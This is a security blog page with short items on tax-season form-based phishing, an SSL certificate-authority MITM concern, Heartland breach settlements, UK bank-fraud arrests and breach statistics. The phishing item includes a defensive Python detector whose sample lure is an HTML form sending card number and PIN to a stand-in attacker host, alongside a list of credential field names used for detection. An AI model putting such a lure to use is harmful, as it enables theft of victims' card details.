The Security Pub

Random Thoughts About Security

Form Based Phishing Attacks are on the RISE

As always, spammers are keeping abreast of the important events of the season, and know that January is when the public usually submits tax returns and starts getting refunds. Websense is reporting that the form-based approach is being used more frequently than the usual direct links to phishing sites.

What are form-based email attacks?

Form-based attacks are just another type of phishing attack. Instead of using a link to take the user to a phishing site, the attacker includes a form in the email itself that the user is asked to complete. When the user completes the form and submits it, the details are sent directly to the attacker. Here is a short video that shows an example.
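Because the lure lives inside the message rather than behind a link, URL-reputation checks alone will miss it; a mail gateway has to look at the HTML body for the form itself. The script below is an added example (not from the original post or from Websense) that parses an HTML email body with the Python standard library, records every `<form>`, and flags any that posts to a host outside the sender's domain or that asks for credential or card fields. The sender domain, the keyword list and the sample message are all constructed for illustration.

```python
"""
Flag HTML e-mail bodies that embed a <form> posting to an external destination
or collecting sensitive fields. Added example, standard library only.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic list of input names that suggest credential or card harvesting
# (assumed for this example, not taken from any vendor product).
SENSITIVE_FIELDS = {"password", "passwd", "pin", "ssn", "card", "cvv", "account"}


class FormCollector(HTMLParser):
    """Collect every <form> in the body with its action, method and inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute names arrive lowercased by html.parser
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "name": (a.get("name") or "").lower(),
                "type": (a.get("type") or "text").lower(),
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def same_domain(host, sender_domain):
    """True when host is the sender's domain or one of its subdomains."""
    return host == sender_domain or host.endswith("." + sender_domain)


def analyze_email_html(html, sender_domain):
    """Return one finding per suspicious form; an empty list means no indicator."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        parsed = urlparse(form["action"])
        if parsed.scheme == "mailto":
            # A mailto: action hands the submitted fields straight to a mailbox
            # (assumed variant of the technique; treated as always external).
            destination, external = parsed.path, True
        else:
            destination = parsed.hostname or ""
            external = bool(destination) and not same_domain(destination, sender_domain)
        sensitive = [
            i["name"] for i in form["inputs"]
            if i["type"] == "password" or any(k in i["name"] for k in SENSITIVE_FIELDS)
        ]
        if external or sensitive:
            findings.append({
                "action": form["action"],
                "method": form["method"],
                "external_host": destination if external else None,
                "sensitive_fields": sensitive,
            })
    return findings


# Constructed sample body modelled on the tax-refund lure described above.
SAMPLE_PHISH = """<html><body>
<p>Your refund is ready. Confirm your details below to receive it.</p>
<form action="http://collect.bad.example/refund.php" method="post">
  Full name: <input type="text" name="fullname">
  Card number: <input type="text" name="cardnumber">
  PIN: <input type="password" name="pin">
  <input type="submit" value="Get refund">
</form>
</body></html>"""

if __name__ == "__main__":
    # Sender domain is constructed; in practice take it from the From: header.
    for finding in analyze_email_html(SAMPLE_PHISH, "taxrefund.example"):
        print(finding)
```

In a gateway this would run on the decoded `text/html` part of each message, with the sender domain taken from the authenticated From: header; any finding with `external_host` set is a strong signal on its own, while `sensitive_fields` without an external host still merits a closer look, since legitimate newsletters rarely ask for a PIN by mail.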

UAE Man-in-the-Middle Attack Against SSL

Who are these certificate authorities? At the beginning of Web history, there were only a handful of companies, like Verisign, Equifax, and Thawte, that made near-monopoly profits from being the only providers trusted by Internet Explorer or Netscape Navigator. But over time, browsers have trusted more and more organizations to verify Web sites. Safari and Firefox now trust more than 60 separate certificate authorities by default. Microsoft’s software trusts more than 100 private and government institutions.

Read the full article – [Schneier on Security]

Heartland Set To Pay Discover $5M For 2008 Data Breach

Heartland Payment Systems has agreed to pay $5 million to Discover to settle claims arising from the massive data breach disclosed by the payment processor last year.

In a brief statement on Wednesday, the Princeton, N.J.-based Heartland said the settlement “resolves all issues” between the two companies stemming from the intrusion.

“This settlement marks our final agreement with a card brand related to the intrusion,” Heartland CEO Robert Carr said in the statement.

In January, Heartland agreed to set aside $60 million to reimburse banks issuing Visa cards, for breach-related costs. Heartland has also agreed to pay $3.6 million to settle claims brought against it by American Express and more than $41 million to reimburse MasterCard issuers for breach-related costs.

In addition to settling with the major card brands, Heartland also has offered to pay $4 million to settle a consolidated consumer class action lawsuit being heard in Texas.

All of the settlement money has come from the $140 million Heartland set aside to cover the costs related to the breach. That amount includes more than $26 million in legal costs.

Heartland, one of the largest processors of payment card transactions in the U.S., disclosed in January 2009 that hackers had broken into its systems in 2008 and stolen credit and debit card data. Authorities later said that data on as many as 130 million credit and debit cards had been stolen, making it the largest ever breach involving payment card data.

The intrusions at Heartland and several other major retailers were later traced to a gang of cyber thieves led by Miami-based Albert Gonzalez who was sentenced in March to 20 years in federal prison.

Source: ComputerWorld

Six arrested for compromising 10,000 online bank accounts

Six people have been arrested on suspicion of stealing credit cards, personal information and banking details as part of a suspected online banking fraud.

On Tuesday 3 and Wednesday 4 August 2010, officers from the Metropolitan Police Service’s (MPS) Police Central e-Crime Unit (PCeU), assisted by the MPS Territorial Support Group and the Irish Garda Síochána Fraud Investigation Bureau, executed five search warrants across London and at an address in Navan, County Meath, Ireland.


Check out the article – [Help Net Security]

Data Breaches Blamed on Organized Crime

Cybercrooks continue to be a menace to corporate security, with hackers and malware authors responsible for 85% of all stolen data. Data breaches crop up in all types of industries but financial services, hospitality and retail still make up the “Big Three” of industries affected (accounting for 33%, 23% and 15% of incidents, respectively). However, a huge majority (94%) of all compromised records in 2009 were attributable to breaches at financial service firms.

Check out the article – [The Register]